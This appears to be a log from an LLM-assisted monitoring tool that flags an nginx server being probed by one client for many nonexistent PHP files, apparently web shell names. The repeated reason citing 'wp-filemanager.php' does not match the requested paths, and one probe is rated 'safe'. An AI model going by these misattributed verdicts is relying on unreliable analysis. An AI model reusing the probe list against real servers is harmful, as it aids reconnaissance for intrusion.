Mar 20 14:02:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:02:21.097125 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An error log showing an attempt to open a non-existent PHP file (666.php) from a client IP may indicate probing or malicious activity against the nginx server. Line=2026-03-20T13:58:58.837529062Z 2026/03/20 13:58:58 [error] 422#422: *750796 open() "/usr/share/nginx/default/666.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: "...
Mar 20 14:02:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:02:21.097221 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:58.837643993Z 4.204.200.32 - - [20/Mar/2026:13:58:58 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /666.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:02:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:02:26.992495 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 14:02:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:02:26.992545 [analyzer] Confidence 0.65 too low for pattern learning (need 0.85+)
Mar 20 14:02:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:02:26.992642 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:58.905329177Z 4.204.200.32 - - [20/Mar/2026:13:58:58 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /zc-104.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:02:31.941612 [observer] Pipeline: processed=5993 pattern_hits=5652 llm_calls=341 llm_errors=3 learned=4
Mar 20 14:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:02:31.941639 [observer] Patterns: hash=5652 prefix=0 regex=0 contains=0 deny=68 alert=471 suppress=0 misses=341
Mar 20 14:02:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:02:34.254703 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:02:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:02:34.254758 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason= nginx error showing missing file ws88.php when handling a GET request; could indicate probing for PHP files or misconfigured routes. Line=2026-03-20T13:58:58.973087363Z 2026/03/20 13:58:58 [error] 422#422: *750796 open() "/usr/share/nginx/default/ws88.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: ...
Mar 20 14:02:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:02:34.254841 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:58.973137156Z 4.204.200.32 - - [20/Mar/2026:13:58:58 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /ws88.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:02:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:02:38.912567 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:02:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:02:38.912612 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An HTTP request tried to access ws60.php and nginx failed to find the file. Could indicate probing for PHP files or misconfiguration. Line=2026-03-20T13:58:59.042479169Z 2026/03/20 13:58:59 [error] 422#422: *750796 open() "/usr/share/nginx/default/ws60.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: ...
Mar 20 14:02:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:02:38.912680 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:59.042487523Z 4.204.200.32 - - [20/Mar/2026:13:58:59 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /ws60.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:02:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:02:47.312318 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.68 action=alert pattern_type=
Mar 20 14:02:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:02:47.312361 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to a PHP file that does not exist (bo.php) suggests probing for vulnerable entry points often associated with web app attacks. Line=2026-03-20T13:58:59.110203154Z 2026/03/20 13:58:59 [error] 422#422: *750796 open() "/usr/share/nginx/default/bo.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: "G...
Mar 20 14:02:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:02:47.312441 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:59.110359018Z 4.204.200.32 - - [20/Mar/2026:13:58:59 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /bo.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:02:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:02:54.694960 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.55 action=alert pattern_type=
Mar 20 14:02:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:02:54.694998 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An error indicating a missing PHP file being requested (possible probing for web resources). Not confirmed malicious, but warrants attention. Line=2026-03-20T13:58:59.185746259Z 2026/03/20 13:58:59 [error] 422#422: *750796 open() "/usr/share/nginx/default/ws84.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: ...
Mar 20 14:02:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:02:54.695081 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:59.185753597Z 4.204.200.32 - - [20/Mar/2026:13:58:59 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /ws84.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:02:59 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:02:59.550310 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 14:02:59 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:02:59.550345 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Requested file vx.php under /public/ likely to probe for vulnerable PHP file; file not found but could indicate attempted exploitation Line=2026-03-20T13:58:59.253763928Z 2026/03/20 13:58:59 [error] 422#422: *750796 open() "/usr/share/nginx/default/public/vx.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, requ...
Mar 20 14:02:59 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:02:59.550407 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:59.253767227Z 4.204.200.32 - - [20/Mar/2026:13:58:59 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /public/vx.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:03:01.950598 [observer] Pipeline: processed=6003 pattern_hits=5657 llm_calls=346 llm_errors=3 learned=4
Mar 20 14:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:03:01.950628 [observer] Patterns: hash=5657 prefix=0 regex=0 contains=0 deny=68 alert=476 suppress=0 misses=346
Mar 20 14:03:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:03:03.825232 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 14:03:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:03:03.825274 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=nginx error showing missing file for a requested PHP resource (vanda.php) from a client IP. Could indicate probing for vulnerable file paths or misconfig, though may also be benign. Line=2026-03-20T13:58:59.321467782Z 2026/03/20 13:58:59 [error] 422#422: *750796 open() "/usr/share/nginx/default/vanda.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request:...
Mar 20 14:03:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:03:03.825342 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:59.321520178Z 4.204.200.32 - - [20/Mar/2026:13:58:59 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /vanda.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:03:07 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:03:07.905425 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:03:07 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:03:07.905464 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /amp.php resulting in a file not found can indicate probing for vulnerable scripts; while not definitive, it warrants monitoring. Line=2026-03-20T13:58:59.389314604Z 2026/03/20 13:58:59 [error] 422#422: *750796 open() "/usr/share/nginx/default/amp.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: "...
Mar 20 14:03:07 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:03:07.905528 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:59.389331356Z 4.204.200.32 - - [20/Mar/2026:13:58:59 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /amp.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:03:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:03:14.244719 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 14:03:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:03:14.244761 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Open() failure for a PHP file in a web server context can indicate missing resource or probing for vulnerable paths; not definitively malicious but warrants attention. Line=2026-03-20T13:58:59.457990256Z 2026/03/20 13:58:59 [error] 422#422: *750796 open() "/usr/share/nginx/default/a4.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: "G...
Mar 20 14:03:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:03:14.245022 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:59.457998208Z 4.204.200.32 - - [20/Mar/2026:13:58:59 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /a4.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:03:19 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:03:19.094693 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:03:19 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:03:19.094733 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An error log showing a client requesting /1.php which does not exist; this can indicate probing or automated scanning activity. Line=2026-03-20T13:58:59.525713376Z 2026/03/20 13:58:59 [error] 422#422: *750796 open() "/usr/share/nginx/default/1.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: "GE...
Mar 20 14:03:19 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:03:19.094802 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:59.525818974Z 4.204.200.32 - - [20/Mar/2026:13:58:59 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /1.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:03:27 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:03:27.794033 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 14:03:27 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:03:27.794071 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /b.php in web server logs is a common probe for PHP shells or misconfigurations; the file does not exist, but the attempt itself is suspicious and warrants monitoring. Line=2026-03-20T13:58:59.602790937Z 2026/03/20 13:58:59 [error] 422#422: *750796 open() "/usr/share/nginx/default/b.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: "GE...
Mar 20 14:03:27 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:03:27.794134 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:59.602807332Z 4.204.200.32 - - [20/Mar/2026:13:58:59 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /b.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:03:31.940401 [observer] Pipeline: processed=6013 pattern_hits=5662 llm_calls=351 llm_errors=3 learned=4
Mar 20 14:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:03:31.940425 [observer] Patterns: hash=5662 prefix=0 regex=0 contains=0 deny=68 alert=481 suppress=0 misses=351
Mar 20 14:03:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:03:34.620457 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:03:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:03:34.620491 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to a potentially mis-typed file (/hots.php) on an error path; probes for PHP files can indicate reconnaissance or misconfiguration attempts. Line=2026-03-20T13:58:59.670385093Z 2026/03/20 13:58:59 [error] 422#422: *750796 open() "/usr/share/nginx/default/hots.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: ...
Mar 20 14:03:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:03:34.620555 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:59.670531849Z 4.204.200.32 - - [20/Mar/2026:13:58:59 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /hots.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:03:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:03:41.138012 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.68 action=alert pattern_type=
Mar 20 14:03:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:03:41.138082 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Attempted access to wp-the.php indicates probing for WordPress-related files; could be vulnerability reconnaissance. Not clearly malicious on its own but warrants alert. Line=2026-03-20T13:58:59.738265894Z 2026/03/20 13:58:59 [error] 422#422: *750796 open() "/usr/share/nginx/default/wp-the.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request...
Mar 20 14:03:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:03:41.138150 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:59.738275549Z 4.204.200.32 - - [20/Mar/2026:13:58:59 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /wp-the.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:03:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:03:44.803821 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 14:03:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:03:44.803871 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to kj.php resulted in a missing file error, which is a common probe target for web shells or malicious access attempts. Not definitively malicious on its own, but warrants attention. Line=2026-03-20T13:58:59.805904747Z 2026/03/20 13:58:59 [error] 422#422: *750796 open() "/usr/share/nginx/default/kj.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: "G...
Mar 20 14:03:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:03:44.803936 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:59.805999194Z 4.204.200.32 - - [20/Mar/2026:13:58:59 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /kj.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:03:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:03:44.803965 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:59.874544587Z 4.204.200.32 - - [20/Mar/2026:13:58:59 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /a5.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:03:51 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:03:51.014562 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.60 action=alert pattern_type=
Mar 20 14:03:51 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:03:51.014601 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An error log showing a missing file a5.php being requested suggests probing for PHP assets; could be benign misconfiguration or a light probe Line=2026-03-20T13:58:59.874558264Z 2026/03/20 13:58:59 [error] 422#422: *750796 open() "/usr/share/nginx/default/a5.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: "G...
Mar 20 14:03:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:03:56.233391 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:03:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:03:56.233432 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Error log shows an access to a likely non-existent PHP file (probe-like pattern) which could indicate probing for vulnerable assets. Line=2026-03-20T13:58:59.942753237Z 2026/03/20 13:58:59 [error] 422#422: *750796 open() "/usr/share/nginx/default/44.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: "G...
Mar 20 14:03:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:03:56.233494 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:58:59.942782674Z 4.204.200.32 - - [20/Mar/2026:13:58:59 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /44.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:04:01.725404 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:04:01.725443 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request for a potentially sensitive PHP file (/public/ws49.php) resulting in a file-not-found error; could indicate probing for vulnerable assets or misconfiguration. Line=2026-03-20T13:59:00.016638541Z 2026/03/20 13:59:00 [error] 422#422: *750796 open() "/usr/share/nginx/default/public/ws49.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, re...
Mar 20 14:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:04:01.725505 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:00.016721811Z 4.204.200.32 - - [20/Mar/2026:13:59:00 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /public/ws49.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:04:01.963199 [observer] Pipeline: processed=6025 pattern_hits=5668 llm_calls=357 llm_errors=3 learned=4
Mar 20 14:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:04:01.963231 [observer] Patterns: hash=5668 prefix=0 regex=0 contains=0 deny=68 alert=487 suppress=0 misses=357
Mar 20 14:04:06 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:04:06.018822 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:04:06 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:04:06.018858 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Error log shows a request for a non-existent PHP file (xxw.php), suggesting probing or attempted access to VM/web server resources. Line=2026-03-20T13:59:00.091480906Z 2026/03/20 13:59:00 [error] 422#422: *750796 open() "/usr/share/nginx/default/xxw.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: "...
Mar 20 14:04:06 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:04:06.018933 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:00.091487797Z 4.204.200.32 - - [20/Mar/2026:13:59:00 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /xxw.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:04:10 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:04:10.255223 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 14:04:10 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:04:10.255259 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to a likely malicious PHP file (sa.php7) and failed open suggests probing for PHP scripts or misconfigurations. Typical in web server reconnaissance and PHP-targeted exploits. Line=2026-03-20T13:59:00.177460094Z 2026/03/20 13:59:00 [error] 422#422: *750796 open() "/usr/share/nginx/default/sa.php7" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: "...
Mar 20 14:04:10 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:04:10.255325 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:00.177523873Z 4.204.200.32 - - [20/Mar/2026:13:59:00 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /sa.php7 HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:04:16 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:04:16.578539 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:04:16 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:04:16.578578 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An error log showing an attempt to open a PHP file (ms-edit.php) in the webroot. This could indicate probing for vulnerable PHP scripts or misconfigurations, but is not definitive malicious activity. Line=2026-03-20T13:59:00.246595926Z 2026/03/20 13:59:00 [error] 422#422: *750796 open() "/usr/share/nginx/default/ms-edit.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, reques...
Mar 20 14:04:16 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:04:16.578945 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:00.246685770Z 4.204.200.32 - - [20/Mar/2026:13:59:00 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /ms-edit.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:04:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:04:20.955257 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:04:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:04:20.955302 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An HTTP request to /wp9.php resulted in a file not found error, indicating probing for PHP files often associated with Magento/WordPress reconnaissance Line=2026-03-20T13:59:00.314368911Z 2026/03/20 13:59:00 [error] 422#422: *750796 open() "/usr/share/nginx/default/wp9.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: "...
Mar 20 14:04:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:04:20.955368 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:00.314466561Z 4.204.200.32 - - [20/Mar/2026:13:59:00 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /wp9.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:04:27 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:04:27.537632 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 14:04:27 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:04:27.537671 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=The log shows an nginx open() failure for a PHP file (wen.php) which is a common probe target. While not definitive malicious activity, it indicates potential probing for web shell or misconfigured paths. Line=2026-03-20T13:59:00.382046239Z 2026/03/20 13:59:00 [error] 422#422: *750796 open() "/usr/share/nginx/default/wen.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: "...
